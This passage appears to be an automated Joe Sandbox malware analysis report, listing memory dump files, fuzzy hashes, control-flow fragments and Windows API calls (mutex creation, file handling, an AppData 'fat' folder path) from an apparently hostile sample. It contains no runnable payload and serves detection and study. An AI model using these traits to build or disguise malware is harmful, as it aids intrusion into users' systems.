• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: CreateMutexlstrlen
• String ID:
• API String ID: 2542342894-0
• Opcode ID: ecdafdb22cedd250096534cca25e636da4a06d4c24eba122f98eff74b15daa98
• Instruction ID: b81b1f362ee2ad241df6c7191a9dbda3eb3625633ed8fc9e24ff20f647811c92
• Opcode Fuzzy Hash: ecdafdb22cedd250096534cca25e636da4a06d4c24eba122f98eff74b15daa98
• Instruction Fuzzy Hash: 7EE048B29017A5ABDBA16FB1DC5DB9A3BE8EF01254B154725FA01D9080DB38C710C761
APIs
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 07001035
• CloseHandle.KERNEL32(?), ref: 07001099
Memory Dump Source
• Source File: 0000000B.00000003.2864608852.0000000007001000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_7001000_ast.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: fbb43184b826b6abe57b31de2b775d04d5eb9ecacda1644dcf87349424a33543
• Instruction ID: e40146005b04525ebc40bd926a600e087f003db07dc5e13284d53aaa9afdd3c4
• Opcode Fuzzy Hash: fbb43184b826b6abe57b31de2b775d04d5eb9ecacda1644dcf87349424a33543
• Instruction Fuzzy Hash: B9112EB4600305EFEB616FB4CD4AF697AE9FB04300F25C261A980DB2D9DA75D9049B51

Control-flow Graph
control_flow_graph 83 7064db5-7064dd3 wsprintfA CreateMutexA 85 7064dd7-7064dda 83->85 86 7064dd5 83->86 86->85
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
• Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7000000_ast.jbxd
Similarity
• API ID: CreateMutexwsprintf
• String ID:
• API String ID: 1107950-0
• Opcode ID: 491ee96da1f39f85aaac83f462c2d47c91582d13e4a2c114ce5e36d15c476d3e
• Instruction ID: cafd495364a64e36139761136ce8f89e460d9b9187980917f828461c85346606
• Opcode Fuzzy Hash: 491ee96da1f39f85aaac83f462c2d47c91582d13e4a2c114ce5e36d15c476d3e
• Instruction Fuzzy Hash: 28D0A7B2500240ABCF512F94D88DA4A3FD4EF112543008514F6058A040D2398220CB50

Control-flow Graph
control_flow_graph 87 7064365-706439b SetErrorMode
APIs
• SetErrorMode.KERNEL32(00008000), ref: 07064397
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
APIs
• lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\fat\), ref: 07064D05
• PathRemoveBackslashA.SHLWAPI(?), ref: 07064D0C
Strings
• C:\Users\user\AppData\Roaming\fat\, xrefs: 07064CFF
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
APIs
• lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\fat\), ref: 07064D47
• PathRemoveBackslashA.SHLWAPI(?), ref: 07064D4E
Strings
• C:\Users\user\AppData\Roaming\fat\, xrefs: 07064D41
Memory Dump Source
• Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true